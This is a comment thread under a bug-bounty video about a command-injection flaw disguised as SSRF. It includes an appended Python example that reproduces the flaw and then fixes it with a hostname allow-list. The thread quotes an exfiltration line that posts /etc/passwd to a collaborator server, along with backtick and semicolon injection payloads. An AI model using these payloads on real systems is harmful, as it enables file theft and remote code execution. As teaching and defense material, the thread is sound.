That's effin' diabolical mate. Great explanation! Really enjoying your channel.
That's a great find.. learned something new today.✌️
Happy to hear that!
@thehackerish For example, where do you put the commands: outside the quotes of the server address, or...?
Was simple, but never thought about it. Thanks for it!
Happy to help!
I love this channel; he does very elegant, explicit demonstrations. Hope you post more videos on SSRF and XSS.
Thank you!
Hi! Thanks for the awesome content.
Thank you brother. You and your channel are the world's best channel that teaches noobs from 0 2 h3r0. Love you, respect you, salute you 🤝❤💙💚💐👍
Oh! What a kind comment! I am humbled, Enjoy!!!
Marvelous explanation 👍 Keep doing it, bro
Great video, thanks for sharing 👍
Thanks for the visit!
Great video. Thank you very much for the content and the teaching.
Thank you for your kind feedback, Enjoy!
great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties or do you think your work is done after initial access?
Great question. I reported it and asked them if they want me to escalate my privileges, but they preferred to quickly fix it.
@thehackerish Thanks for the quick reply. Good idea to first ask for permission :)
@thehackerish Hey bro, your work is good, you help us learn, but can you please show an example of the request and how you add the command injection, since I find it harder? Do you put the commands, then dot burpcollaborator, without quotes, to the Burp address?
Learned a new methodology, thanks for the amazing video 😍
My pleasure 😊
Wow, great stuff 👍👍
Thank you!
Great explanation!!
Glad it was helpful!
You are amazing man. Love yaa ❣️
Isn't this more similar to just plain command injection? I get that it was making requests to a server but SSRF usually accesses internal services eg a Redis database which I'm sure you could have done but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.
Yeah, I agree on the command injection point, but the first impression you get is that it is an SSRF. However, you'd be surprised how careless devs can be, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)
Super amazing! Thank you! :)
Enjoy!
This is stunning :o
Were the payloads shown in the video the ones you used, or did you just write them for explanation? If not, please share them with resources, and thanks a lot.
The injection was the same. I just replaced the long Collaborator URL with a short one for visual purposes.
@thehackerish Wow, that's really cool. Thanks for your replies and the (very) awesome content :)
@adamproof3440 My pleasure! Thanks for your kind comment!
Great
Great Finding ! congrats
Thanks!
Great explanation... Please include screenshots for this type of content.
It's meant to be a sleep story ;) Just kidding.
Really mind-blowing, owwssaaammmmm
Thank youuuu
Best Hacker ...
Thank you so much bro ❤❤
My pleasure!
really interesting video
Glad you liked it
Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice: `curl -F '@/etc/passwd' mycollab-server`.mycollab-server. Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end makes it conform to what looks like a valid hostname? If this is the case, will your server receive two requests out of that one payload? And could the second "mycollab-server" just as well be example.com or anything else?
You have a sharp eye, Great question!
Since the content of passwd does not comply with hostname syntax, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet.
If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.
@thehackerish I get it! Thanks for your fast reply here, almost a year after you posted it.
Brother, your teaching is nice. But teach with some example sites or with a vulnerable site; then we can understand clearly 🤝
Head over to the other playlists (web hacking training and live hacking sessions)
Practical part for this vuln using your lab setup? Wink-wink :D
;) ;)
I don't understand how hackers can think of a payload like `command`.collaborator.url. Do we really need so much creativity to be a hacker?
Think like a developer :) You can also build some software to get used to it!
@thehackerish I don't know how to do that; I'm completely lost.
@adtiyamuhammadakbar2711 There are many videos teaching how to build a web application :)
`command`.collaborator.url >>>> URL NOT VALID ERROR 😒
Can you upload a practical video on it?
When I have time, I can prepare a lab for it.
Thank you
SSTI - RCE tutorial :)
I don't understand why the server executes the command when you put ` in the URL. Is it standard? Thanks in advance.
It's one of the ways to execute commands in Linux.
Sir, can you tell me how you knew that your command would work if you put it in the subdomain part?
I didn't! Hacking is all trial and error, reflex from experience, and some luck as well :) Just keep reading blogs, and learning new things.
@thehackerish Can I know the name of the exploit? I'm interested in reading about it.
@antimatter6728 You mean a CVE? I haven't filed one. But it's a command injection / SSRF vulnerability.
subbed.
Welcome to the club!
@thehackerish Thanks!
How much bounty did you get for this?
It says it in the title: 4k.
@thehackerish Sorry bro, I didn't notice that!
Hey, nice video! I'm wondering, if you had entered 'domain.com; whoami' for the command injection part, it would've worked too, right? Or did they sanitize input weirdly? Thanks
I think it would work. Actually, I might have used it to chain multiple commands, I don't remember exactly though.
Nice work
Note: `pwd`.mycollaborator-url will be needed to locate the user's home folder 📁 path 🤔
As it was a service, it didn't show /home/xxx, but nice idea as well.
`hi`
So presumably, the hostname you provided was run with a shell command, something like curl.
Why would they choose to do that instead of making the request within the program (like with Axios if they're using a Node backend)?
Good question! They were not using any framework, and the dev made the mistake of trusting the hostname in an ssh command.
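The exchange above is the whole bug in one sentence: a hostname taken from the request was dropped into an ssh command line that a shell parsed, so backticks in the "hostname" ran as a command before ssh ever saw it. The following is an added example, my own code rather than anything from the target or the video, of that mistake next to the fix. It assumes the backend built something like `ssh deploy@<host> uptime` as a shell string (the exact command and the `deploy` user are assumptions); `echo` stands in for ssh in the demonstration so the payload stays harmless.

```python
import re
import subprocess

# RFC 1123 host syntax: labels of letters, digits and hyphens (1-63 chars each),
# no leading or trailing hyphen, joined by dots, 253 chars in total. Backticks,
# $(), ';', spaces and quotes are all outside this alphabet.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*$")


def vulnerable_command(host: str) -> str:
    """The string a shell=True call would hand to /bin/sh -c (assumed backend).

    Anything the shell expands inside host, such as `...`, runs on the server
    with the service's privileges before ssh is even started.
    """
    return f"ssh -o BatchMode=yes deploy@{host} uptime"


def demo_shell_expansion(host: str) -> str:
    """Show what /bin/sh does with an untrusted host, using echo instead of ssh.

    Only ever run this with your own harmless payloads.
    """
    result = subprocess.run(
        f"echo target={host}", shell=True, capture_output=True, text=True, check=True
    )
    return result.stdout.strip()


def is_valid_hostname(host: str) -> bool:
    """Allow-list check: accept only strings that are syntactically hostnames."""
    return bool(HOSTNAME_RE.match(host))


def hardened_argv(host: str) -> list[str]:
    """Hardened form: validate, then build argv so no shell ever parses the value.

    subprocess.run(argv) with shell=False goes straight to execve; a backtick
    would reach ssh as a literal character. The grammar also rejects a leading
    '-', which would otherwise let the value be read as an ssh option.
    """
    if not is_valid_hostname(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return ["ssh", "-o", "BatchMode=yes", f"deploy@{host}", "uptime"]


if __name__ == "__main__":
    payload = "`echo INJECTED`.mycollab-server"  # same shape as the video's payload
    print(vulnerable_command(payload))
    print(demo_shell_expansion(payload))  # target=INJECTED.mycollab-server
    for h in ("mycollab-server", payload, "domain.com; whoami", "-oProxyCommand=x"):
        print(f"{h!r:40} valid={is_valid_hostname(h)}")
```

The validation is the part that matters: switching to an argv list alone stops the shell, but without the allow-list a value such as `-oProxyCommand=...` would still be interpreted by ssh itself, which is why the regex rejects any label that starts with a hyphen.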
Please share how to use Acunetix results to exploit found vulnerabilities like SQLi, XSS, XSRF, LFI, RFI, etc.: bypassing WAF/IDS/IPS, hash recognition, hash cracking, finding hidden admin panels, bypassing admin panels or cPanels, uploading a shell, remote code execution (RCE), rooting the web server, gaining root privilege, mass defacement, maintaining a backdoor, etc.
Would love to, but I am not familiar with the Acunetix scanner. It should be similar to Burp Suite Pro, I guess.
@thehackerish Yes, exactly... no problem at all brother... teach us with any available tool or script as per your convenience... you are excellent, but I am very weak in the website hacking and website bug bounty hunting field, as most RUclips videos are just basic... not practical and easy to understand.... You are the best teacher... May God bless you for your efforts and help 🤝❤💙💚🌹💐👍
Want to be an ethical hacker? Then enroll with thehackerish ❤️
Thank you!
Loved it! Thanks 🤘
@thehackerish What if the input only accepts something after a fixed prefix? I mean, if not, it throws an error. Any bypass for exfiltrating metadata? (#blindssrf) 🙂
@chaitanyacse3332 In this case you can still do `inject here`.collaborator, since this story is basically a command injection.
@thehackerish I tried the same too, but it's not accepting these `` quotes. Any other bypasses? 😉